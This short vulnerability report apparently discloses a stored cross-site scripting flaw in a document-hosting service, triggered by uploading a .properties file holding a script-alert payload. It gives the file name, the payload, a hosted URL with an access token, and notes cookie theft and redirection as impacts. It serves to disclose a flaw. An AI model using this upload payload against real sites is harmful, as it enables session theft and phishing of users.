Stored XSS via uploading file in .properties format.
filename="test.properties"
<script>alert(1)</script>
https://img.showdoc.cc/622f467833127_622f467833120.properties?e=1647269010&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:o4Avvyq1nJSSadhWuytWRYg6K1Q=
An attacker can perform social engineering on users by redirecting them from a real website to a fake one. a hacker can steal their cookies etc.